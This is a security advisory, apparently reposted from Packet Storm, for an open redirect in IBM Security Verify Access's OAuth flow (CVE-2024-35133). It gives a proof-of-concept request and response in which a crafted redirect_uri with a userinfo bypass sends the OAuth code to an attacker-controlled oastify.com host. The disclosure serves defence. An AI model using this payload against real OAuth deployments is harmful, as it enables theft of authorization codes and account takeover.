Exploit for IBM Security Verify Access 10.0.8 Open Redirection CVE-2024-35133

Name: Exploit for IBM Security Verify Access 10.0.8 Open Redirection CVE-2024-35133
Rating: 5 (284 reviews)
2024-10-18 | CVSS 8.2
## https://sploitus.com/exploit?id=PACKETSTORM:182287
- IBM Security Verify Access >= 10.0.0 <= 10.0.8 - Open Redirect during  
OAuth Flow  
  
======== < Table of Contents >  
================================================  
  
0. Overview  
1. Detailed Description  
2. Proof Of Concept  
3. Solution  
4. Disclosure Timeline  
5. References  
6. Credits  
7. Legal Notices  
  
======== < 0. Overview >  
======================================================  
  
Revision:  
1.0  
  
Impact:  
By persuading a victim to visit a specially crafted Web site, a remote  
attacker could exploit this vulnerability to spoof the URL displayed  
to redirect a user to a malicious Web site that would appear to be  
trusted. This could allow the attacker to obtain highly sensitive  
information or conduct further attacks against the victim.  
  
Severity:  
NIST: High  
IBM: Medium  
  
CVSS Score:  
NIST 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)  
IBM 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)  
  
CVE-ID:  
CVE-2024-35133  
  
Vendor:  
IBM  
  
Affected Products:  
IBM Security Verify Access  
IBM Security Verify Access Docker  
  
Affected Versions:  
10.0.0 - 10.0.8  
  
Product Description:  
  
IBM Security Verify Access is a complete authorization and network  
security policy management solution. It provides end-to-end protection  
of resources over geographically dispersed intranets and extranets.  
  
In addition to state-of-the-art security policy management, IBM Security  
Verify Access provides authentication, authorization, data security, and  
centralized resource management capabilities.  
  
IBM Security Verify Access offers the following features:  
Authentication ~ Provides a wide range of built-in authenticators and  
supports external authenticators.  
  
Authorization ~ Provides permit and deny decisions for protected  
resources  
requests in the secure domain through the authorization API.  
  
Data security and centralized resource management ~ Manages secure  
access  
to private internal network-based resources by using the public  
Internet's  
broad connectivity and ease of use with a corporate firewall system.  
  
======== < 1. Detailed Description >  
==========================================  
  
During a Penetration Test of the OAuth flow for a client, it was found an  
Open Redirect vulnerability that can led to the leakage of the OAuth  
"code" variable.  
  
It was possible to bypass the parser's logic responsible for verifying the  
correctness and the validity of the "redirect_uri" parameter during an  
OAuth  
flow by leveraging RFC 3986 (3.2.1) providing a username and password  
directly  
in the Uniform Resource Identifier (URI).  
  
By providing as the "username" field a legitimate and expected domain, it  
was possible to bypass the whitelist filter used by "IBM Security Verify  
Access"  
and cause an Open Redirect to any arbitrary domain controlled by the  
attacker,  
not only altering the expected flow and redirect a user to a malicious  
Web site that would appear to be trusted.  
  
This could allow the attacker to obtain highly sensitive like the OAuth  
"code"  
token or conduct further attacks against the victim  
  
======== < 2. Proof of Concepts >  
=============================================  
  
===== REQUEST =====  
  
[[  
GET  
/oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=  
https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+  
HTTP/1.1  
Host: [REDACTED]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101  
Firefox/115.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
Connection: close  
]]  
  
===== RESPONSE =====  
  
[[  
HTTP/1.1 302 Found  
content-language: en-US  
date: Tue, 19 Mar 2024 16:04:35 GMT  
location:  
https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]  
p3p: CP="NON CUR OTPi OUR NOR UNI"  
x-frame-options: DENY  
x-content-type-options: nosniff  
cache-control: no-store  
x-xss-protection: 1; mode=block  
x-permitted-cross-domain-policies: none  
cross-origin-resource-policy: same-site  
content-security-policy: frame-ancestors 'none'  
referrer-policy: no-referrer-when-downgrade  
strict-transport-security: max-age=31536000; includeSubDomains  
pragma: no-cache  
Content-Length: 0.  
]]  
  
======== < 3. Solution >  
======================================================  
  
Refer to IBM Security Bulletin 7166712 for patch, upgrade or  
suggested workaround information.  
  
See "References" for more details.  
  
======== < 4. Disclosure Timeline >  
===========================================  
  
19/03/2024 - Vulnerability discovered by the Security Researcher (Giulio  
Garzia)  
21/03/2024 - Vulnerability shared with the client who committed the  
Penetration Test on his infrastructure, relying on IBM SVA  
02/04/2024 - Vulnerability shared with IBM  
02/04/2024 - Vulnerability taken over by IBM  
14/05/2024 - Vulnerability confirmed by IBM  
18/07/2024 - Pre-release provided by IBM to the customer to verify the  
resolution of the vulnerability  
27/08/2024 - Security Bulletin and vulnerability shared by IBM  
  
======== < 5. References >  
====================================================  
  
(1)  
https://www.ibm.com/support/pages/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133  
(2) https://exchange.xforce.ibmcloud.com/vulnerabilities/291026  
(3) https://nvd.nist.gov/vuln/detail/CVE-2024-35133  
(4) https://cwe.mitre.org/data/definitions/178.html  
  
======== < 6. Credits >  
=======================================================  
  
This vulnerability was discovered and reported by:  
  
Giulio Garzia 'Ozozuz'  
  
Contacts:  
  
https://www.linkedin.com/in/giuliogarzia/  
https://github.com/Ozozuz  
  
======== < 7. Legal Notices >  
================================================  
  
Copyright (c) 2024 Giulio Garzia "Ozozuz"  
  
Permission is granted for the redistribution of this alert  
electronically. It may not be edited in any way without mine express  
written consent. If you wish to reprint the whole or any  
part of this alert in any other medium other than electronically,  
please email me for permission.  
  
Disclaimer: The information in the advisory is believed to be accurate  
at the time of publishing based on currently available information.  
Use of the information constitutes acceptance for use in an AS IS  
condition.  
There are no warranties with regard to this information. Neither the  
author nor the publisher accepts any liability for any direct,  
indirect, or consequential loss or damage arising from use of,  
or reliance on,this information.